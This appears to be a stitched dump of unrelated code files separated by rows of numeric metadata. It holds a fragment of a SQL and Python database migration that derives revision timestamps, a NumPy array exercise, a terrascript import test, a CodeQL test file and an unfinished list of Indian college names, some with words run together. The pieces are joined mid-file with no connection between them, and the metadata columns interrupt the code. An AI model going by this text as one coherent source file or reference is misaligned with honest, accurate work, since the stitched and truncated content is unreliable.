ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE package_extra_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE group_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE group_extra_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE package_group_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE package_tag_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE resource_group_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE resource_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE package_relationship_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE revision
ADD COLUMN approved_timestamp timestamp without time zone;
create table tmp_expired_id(id text, revision_id text, revision_timestamp timestamp, expired_timestamp timestamp, expired_id text);
create index id_exp on tmp_expired_id(id, revision_id);
--package revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_revision pr join revision r on pr.revision_id = r.id;
update package_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_package_period on package_revision(revision_timestamp, expired_timestamp, id);
create index idx_package_current on package_revision(current);
--package extra revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_extra_revision pr join revision r on pr.revision_id = r.id;
update package_extra_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_extra_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_package_extra_period on package_extra_revision(revision_timestamp, expired_timestamp, id);
create index idx_package_extra_period_package on package_extra_revision(revision_timestamp, expired_timestamp, package_id);
create index idx_package_extra_current on package_extra_revision(current);
--package group revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_group_revision pr join revision r on pr.revision_id = r.id;
update package_group_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_group_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_package_group_period_package_group on package_group_revision(revision_timestamp, expired_timestamp, package_id, group_id);
create index idx_package_group_current on package_group_revision(current);
-- package_tags
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_tag_revision pr join revision r on pr.revision_id = r.id;
update package_tag_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_tag_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_period_package_tag on package_tag_revision(revision_timestamp, expired_timestamp, package_id, tag_id);
create index idx_package_tag_current on package_tag_revision(current);
-- package relationship
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_relationship_revision pr join revision r on pr.revision_id = r.id;
update package_relationship_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_relationship_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_period_package_relationship on package_relationship_revision(revision_timestamp, expired_timestamp, object_package_id, subject_package_id);
create index idx_package_relationship_current on package_relationship_revision(current);
-- resource revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from resource_revision pr join revision r on pr.revision_id = r.id;
update resource_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update resource_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_resource_period on resource_revision(revision_timestamp, expired_timestamp, id);
create index idx_resource_period_resource_group on resource_revision(revision_timestamp, expired_timestamp, resource_group_id);
create index idx_resource_current on resource_revision(current);
-- resource group revision;
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from resource_group_revision pr join revision r on pr.revision_id = r.id;
update resource_group_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update resource_group_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_resource_group_period on resource_group_revision(revision_timestamp, expired_timestamp, id);
create index idx_resource_group_period_package on resource_group_revision(revision_timestamp, expired_timestamp, package_id);
create index idx_resource_group_current on resource_group_revision(current);
--group revision;
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from group_revision pr join revision r on pr.revision_id = r.id;
update group_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update group_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_group_period on group_revision(revision_timestamp, expired_timestamp, id);
create index idx_group_current on group_revision(current);
--group extra revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from group_extra_revision pr join revision r on pr.revision_id = r.id;
update group_extra_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update group_extra_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_group_extra_period on group_extra_revision(revision_timestamp, expired_timestamp, id);
create index idx_group_extra_period_group on group_extra_revision(revision_timestamp, expired_timestamp, group_id);
create index idx_group_extra_current on group_extra_revision(current);
drop table tmp_expired_id;
-- change state of revision tables
update revision set approved_timestamp = timestamp;
'''
migrate_engine.execute('begin; ' + make_missing_revisions + update_schema + ' commit;')
for table in ['package', 'resource', 'resource_group', 'package_extra',
'package_tag', 'package_relationship', 'group', 'group_extra']:
count = migrate_engine.execute('''select count(*) from "%s"''' % table).first()[0]
revision_expired_id_count = migrate_engine.execute('''select count(*) from %s_revision where %s_revision.expired_id is null''' % (table, table)).first()[0]
revision_expired_data_count = migrate_engine.execute('''select count(*) from %s_revision where %s_revision.expired_timestamp = '9999-12-31' ''' % (table, table)).first()[0]
revision_current = migrate_engine.execute('''select count(*) from %s_revision where %s_revision.current = '1' ''' % (table, table)).first()[0]
assert count == revision_expired_id_count
assert count == revision_expired_data_count
assert count == revision_current
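# --- Hedged, standalone illustration (toy data assumed; requires SQLite >= 3.25
# for window functions) of the lead()-over-partition pattern the migration above
# uses to derive each revision's revision_timestamp / expired_timestamp pair per
# object id, with '9999-12-31' marking the current (unexpired) row.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
create table revision_demo(id text, revision_id text, ts text);
insert into revision_demo values
    ('pkg1', 'r1', '2020-01-01'),
    ('pkg1', 'r2', '2020-02-01'),
    ('pkg2', 'r3', '2020-01-15');
""")
rows = conn.execute("""
select id, revision_id, ts as revision_timestamp,
       lead(ts, 1, '9999-12-31') over (partition by id order by ts) as expired_timestamp
from revision_demo
""").fetchall()
for row in rows:
    print(row)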
| 72.558559
| 343
| 0.779054
| 2,430
| 16,108
| 4.917284
| 0.051029
| 0.082852
| 0.048205
| 0.036154
| 0.833626
| 0.798393
| 0.768767
| 0.724914
| 0.685246
| 0.670516
| 0
| 0.012884
| 0.147132
| 16,108
| 221
| 344
| 72.886878
| 0.856893
| 0.000931
| 0
| 0.379518
| 0
| 0.271084
| 0.945
| 0.178858
| 0
| 0
| 0
| 0
| 0.018072
| 1
| 0.006024
| false
| 0
| 0.018072
| 0
| 0.024096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c12c3682cc8f6a00c43bdb0d4ed36012e031ebfa
| 195
|
py
|
Python
|
scripts/unet/create_exportable_tiles.py
|
SchiffFlieger/semantic-segmentation-master-thesis
|
f54b8321a9e0828e492bc6847acbff80c1a75d7c
|
[
"MIT"
] | 1
|
2021-02-07T09:22:44.000Z
|
2021-02-07T09:22:44.000Z
|
scripts/unet/create_exportable_tiles.py
|
SchiffFlieger/semantic-segmentation-master-thesis
|
f54b8321a9e0828e492bc6847acbff80c1a75d7c
|
[
"MIT"
] | null | null | null |
scripts/unet/create_exportable_tiles.py
|
SchiffFlieger/semantic-segmentation-master-thesis
|
f54b8321a9e0828e492bc6847acbff80c1a75d7c
|
[
"MIT"
] | null | null | null |
from scripts.common.create_exportable_tiles import create_exportable_tile_table
if __name__ == '__main__':
    create_exportable_tile_table(table_suffix="unet", tile_size=57.2, label_size=38.8)
| 39
| 86
| 0.825641
| 29
| 195
| 4.896552
| 0.689655
| 0.338028
| 0.28169
| 0.352113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03352
| 0.082051
| 195
| 4
| 87
| 48.75
| 0.759777
| 0
| 0
| 0
| 0
| 0
| 0.061538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
c149df1bc64642d9bb20ce42beff16098ea0ab62
| 599
|
py
|
Python
|
ue/ue_05/problem_1.py
|
VoxelPi/compm
|
745019d4e0d156910f19ed9168949f150356a349
|
[
"MIT"
] | null | null | null |
ue/ue_05/problem_1.py
|
VoxelPi/compm
|
745019d4e0d156910f19ed9168949f150356a349
|
[
"MIT"
] | 4
|
2022-03-09T22:54:25.000Z
|
2022-03-29T21:33:49.000Z
|
ue/ue_05/problem_1.py
|
VoxelPi/compm
|
745019d4e0d156910f19ed9168949f150356a349
|
[
"MIT"
] | null | null | null |
import numpy as np


def gendot(A, B):
    (n, m) = A.shape
    (p, q) = B.shape
    assert n*m == p*q
    return np.sum(np.reshape(A, (n*m, 1)) * np.reshape(B, (n*m, 1)))


A = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
B = np.array([[1, 0, 1, 0, 1, 0], [1, 0, 1, 0, 1, 0]])
print(gendot(A, B))


def genadd(A, B):
    (n, m) = A.shape
    (p, q) = B.shape
    assert n*m == p*q
    return np.sum(np.reshape(A, (n*m, 1)) + np.reshape(B, (n*m, 1)))


A = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
B = np.array([[1, 0, 1, 0, 1, 0], [1, 0, 1, 0, 1, 0]])
print(genadd(A, B))
| 24.958333
| 68
| 0.459098
| 136
| 599
| 2.022059
| 0.242647
| 0.087273
| 0.109091
| 0.145455
| 0.821818
| 0.821818
| 0.821818
| 0.821818
| 0.821818
| 0.821818
| 0
| 0.128035
| 0.24374
| 599
| 23
| 69
| 26.043478
| 0.479029
| 0
| 0
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 1
| 0.117647
| false
| 0
| 0.058824
| 0
| 0.294118
| 0.117647
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c153a22d554e822c5dbca54ec199215395aae269
| 1,375
|
py
|
Python
|
tests/test_provider_kvrhdn_honeycombio.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_kvrhdn_honeycombio.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_kvrhdn_honeycombio.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_kvrhdn_honeycombio.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:18:50 UTC)
def test_provider_import():
    import terrascript.provider.kvrhdn.honeycombio


def test_resource_import():
    from terrascript.resource.kvrhdn.honeycombio import honeycombio_board
    from terrascript.resource.kvrhdn.honeycombio import honeycombio_column
    from terrascript.resource.kvrhdn.honeycombio import honeycombio_dataset
    from terrascript.resource.kvrhdn.honeycombio import honeycombio_derived_column
    from terrascript.resource.kvrhdn.honeycombio import honeycombio_marker
    from terrascript.resource.kvrhdn.honeycombio import honeycombio_trigger


def test_datasource_import():
    from terrascript.data.kvrhdn.honeycombio import honeycombio_datasets
    from terrascript.data.kvrhdn.honeycombio import honeycombio_query
    from terrascript.data.kvrhdn.honeycombio import honeycombio_trigger_recipient
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.kvrhdn.honeycombio
#
# t = terrascript.provider.kvrhdn.honeycombio.honeycombio()
# s = str(t)
#
# assert 'https://github.com/kvrhdn/terraform-provider-honeycombio' in s
# assert '0.1.4' in s
| 31.976744
| 82
| 0.796364
| 165
| 1,375
| 6.49697
| 0.406061
| 0.206157
| 0.193097
| 0.285448
| 0.569963
| 0.478545
| 0.478545
| 0.117537
| 0
| 0
| 0
| 0.012594
| 0.133818
| 1,375
| 42
| 83
| 32.738095
| 0.88749
| 0.371636
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02381
| 0
| 1
| 0.230769
| true
| 0
| 1
| 0
| 1.230769
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
c16732dde5b8ea3623976694d640f5d74f445c76
| 105
|
py
|
Python
|
app/home/models/__init__.py
|
Monxun/monxun-code
|
35ce6d4aaf3a8afa0b80dde1dae9a1e7603a1f84
|
[
"MIT"
] | null | null | null |
app/home/models/__init__.py
|
Monxun/monxun-code
|
35ce6d4aaf3a8afa0b80dde1dae9a1e7603a1f84
|
[
"MIT"
] | null | null | null |
app/home/models/__init__.py
|
Monxun/monxun-code
|
35ce6d4aaf3a8afa0b80dde1dae9a1e7603a1f84
|
[
"MIT"
] | null | null | null |
from .home_models import *
from .biz_models import *
from .mus_models import *
from .vbt_models import *
| 21
| 26
| 0.771429
| 16
| 105
| 4.8125
| 0.4375
| 0.623377
| 0.623377
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152381
| 105
| 4
| 27
| 26.25
| 0.865169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c1790aa226329b81b657c1efacf09fa4c8764c4a
| 312
|
py
|
Python
|
python/ql/test/experimental/dataflow/ApiGraphs/test4.py
|
timoles/codeql
|
2d24387e9e300bf03be35694816b1e76ae88a50c
|
[
"MIT"
] | 4,036
|
2020-04-29T00:09:57.000Z
|
2022-03-31T14:16:38.000Z
|
python/ql/test/experimental/dataflow/ApiGraphs/test4.py
|
timoles/codeql
|
2d24387e9e300bf03be35694816b1e76ae88a50c
|
[
"MIT"
] | 2,970
|
2020-04-28T17:24:18.000Z
|
2022-03-31T22:40:46.000Z
|
python/ql/test/experimental/dataflow/ApiGraphs/test4.py
|
ScriptBox99/github-codeql
|
2ecf0d3264db8fb4904b2056964da469372a235c
|
[
"MIT"
] | 794
|
2020-04-29T00:28:25.000Z
|
2022-03-30T08:21:46.000Z
|
import mypkg.foo as _foo #$ use=moduleImport("mypkg").getMember("foo")
import mypkg.bar as _bar #$ use=moduleImport("mypkg").getMember("bar")
print(_foo) #$ use=moduleImport("mypkg").getMember("foo") // <module 'mypkg.foo' ...
print(_bar) #$ use=moduleImport("mypkg").getMember("bar") // <module 'mypkg.bar' ...
| 62.4
| 84
| 0.685897
| 40
| 312
| 5.25
| 0.25
| 0.285714
| 0.380952
| 0.552381
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 312
| 4
| 85
| 78
| 0.734266
| 0.737179
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
c1c8e0ec73fb213ba531269ddf69a3f77ce88757
| 45,686
|
py
|
Python
|
data_collection.py
|
Theskyspace/JoSSA-automation
|
b683451268fba34d70a32510f5a8bff3dc6de304
|
[
"Apache-2.0"
] | null | null | null |
data_collection.py
|
Theskyspace/JoSSA-automation
|
b683451268fba34d70a32510f5a8bff3dc6de304
|
[
"Apache-2.0"
] | null | null | null |
data_collection.py
|
Theskyspace/JoSSA-automation
|
b683451268fba34d70a32510f5a8bff3dc6de304
|
[
"Apache-2.0"
] | null | null | null |
colleges = [
'National Institute of Technology, Kurukshetra' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Calicut' ,
'Indian Institute of Engineering Science and Technology, Shibpur' ,
'National Institute of Technology Delhi' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology, Tiruchirappalli' ,
'Maulana Azad National Institute of Technology Bhopal' ,
'National Institute of Technology Hamirpur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Silchar' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Uttarakhand' ,
'Malaviya National Institute of Technology Jaipur' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology, Tiruchirappalli' ,
'National Institute of Technology Patna' ,
'National Institute of Technology Karnataka, Surathkal' ,
'National Institute of Technology Calicut' ,
'Sardar Vallabhbhai National Institute of Technology, Surat' ,
'National Institute of Technology Raipur' ,
'Indian Institute of Information Technology Lucknow' ,
'Punjab Engineering College, Chandigarh' ,
'Visvesvaraya National Institute of Technology, Nagpur' ,
'National Institute of Technology, Warangal' ,
'National Institute of Technology, Andhra Pradesh' ,
'Indian Institute of Engineering Science and Technology, Shibpur' ,
'National Institute of Technology, Jamshedpur' ,
'Malaviya National Institute of Technology Jaipur' ,
'Dr. B R Ambedkar National Institute of Technology, Jalandhar' ,
'National Institute of Technology, Kurukshetra' ,
'National Institute of Technology Puducherry' ,
'University of Hyderabad' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'National Institute of Technology Goa' ,
'Pt. Dwarka Prasad Mishra Indian Institute ofInformation Technology, Design & Manufacture Jabalpur' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'National Institute of Technology Delhi' ,
'National Institute of Technology, Warangal' ,
'National Institute of Technology Hamirpur' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'Atal Bihari Vajpayee Indian Institute of Information Technology& Management Gwalior' ,
'National Institute of Technology Meghalaya' ,
'Indian Institute of Information Technology Lucknow' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Kurukshetra' ,
'National Institute of Technology, Tiruchirappalli' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'National Institute of Technology Calicut' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Karnataka, Surathkal' ,
'National Institute of Technology, Silchar' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Rourkela' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'National Institute of Technology, Rourkela' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'National Institute of Technology, Jamshedpur' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'National Institute of Technology Goa' ,
'Punjab Engineering College, Chandigarh' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology Puducherry' ,
'National Institute of Technology Hamirpur' ,
'National Institute of Technology, Tiruchirappalli' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Uttarakhand' ,
'Jawaharlal Nehru University, Delhi' ,
'Atal Bihari Vajpayee Indian Institute of Information Technology& Management Gwalior' ,
'National Institute of Technology Patna' ,
'National Institute of Technology, Andhra Pradesh' ,
'Indian Institute of Information Technology(IIIT)Kilohrad, Sonepat, Haryana' ,
'International Institute of Information Technology,Naya Raipur' ,
'National Institute of Technology Hamirpur' ,
'Malaviya National Institute of Technology Jaipur' ,
'National Institute of Technology Goa' ,
'National Institute of Technology, Jamshedpur' ,
'Indian Institute of Information Technology Guwahati' ,
'Punjab Engineering College, Chandigarh' ,
'Indian Institute of Information Technology Srirangam,Tiruchirappalli' ,
'National Institute of Technology, Rourkela' ,
'International Institute of Information Technology,Naya Raipur' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'Indian institute of information technology, Raichur,Karnataka' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology Hamirpur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'International Institute of Information Technology,Bhubaneswar' ,
'National Institute of Technology, Warangal' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology Karnataka, Surathkal' ,
'Indian Institute of Information Technology Surat' ,
'National Institute of Technology Calicut' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'Indian Institute of Information Technology (IIIT)Kota,Rajasthan' ,
'National Institute of Technology, Srinagar' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'National Institute of Technology Calicut' ,
'National Institute of Technology, Silchar' ,
'Indian Institute of Information Technology (IIIT) Pune' ,
'Pt. Dwarka Prasad Mishra Indian Institute ofInformation Technology, Design & Manufacture Jabalpur' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'National Institute of Technology Sikkim' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'National Institute of Technology, Rourkela' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'National Institute of Technology Raipur' ,
'Punjab Engineering College, Chandigarh' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'National Institute of Technology, Rourkela' ,
'Malaviya National Institute of Technology Jaipur' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Puducherry' ,
'Indian Institute of Information Technology(IIIT)Kilohrad, Sonepat, Haryana' ,
'National Institute of Technology Arunachal Pradesh' ,
'National Institute of Technology Patna' ,
'National Institute of Technology, Silchar' ,
'International Institute of Information Technology,Bhubaneswar' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'Indian Institute of Information Technology (IIIT), SriCity, Chittoor' ,
'National Institute of Technology, Kurukshetra' ,
'Jawaharlal Nehru University, Delhi' ,
'International Institute of Information Technology,Bhubaneswar' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'National Institute of Technology, Manipur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Mizoram' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'National Institute of Technology Puducherry' ,
'National Institute of Technology, Uttarakhand' ,
'National Institute of Technology Nagaland' ,
'National Institute of Technology, Uttarakhand' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology Meghalaya' ,
'National Institute of Technology Patna' ,
'National Institute of Technology Karnataka, Surathkal' ,
'National Institute of Technology, Silchar' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology Calicut' ,
'Indian Institute of Information Technology(IIIT),Vadodara, Gujrat' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'Indian Institute of Information Technology Bhopal' ,
'National Institute of Technology, Andhra Pradesh' ,
'National Institute of Technology, Warangal' ,
'Indian Institute of Information Technology (IIIT) Pune' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology, Andhra Pradesh' ,
'Indian Institute of Information Technology Srirangam,Tiruchirappalli' ,
'Indian Institute of Information Technology, Design & Manufacturing, Kancheepuram' ,
'National Institute of Technology Agartala' ,
'Indian Institute of Information Technology(IIIT) Una,Himachal Pradesh' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Agartala' ,
'International Institute of Information Technology,Naya Raipur' ,
'Indian Institute of Information Technology (IIIT), SriCity, Chittoor' ,
'National Institute of Technology, Manipur' ,
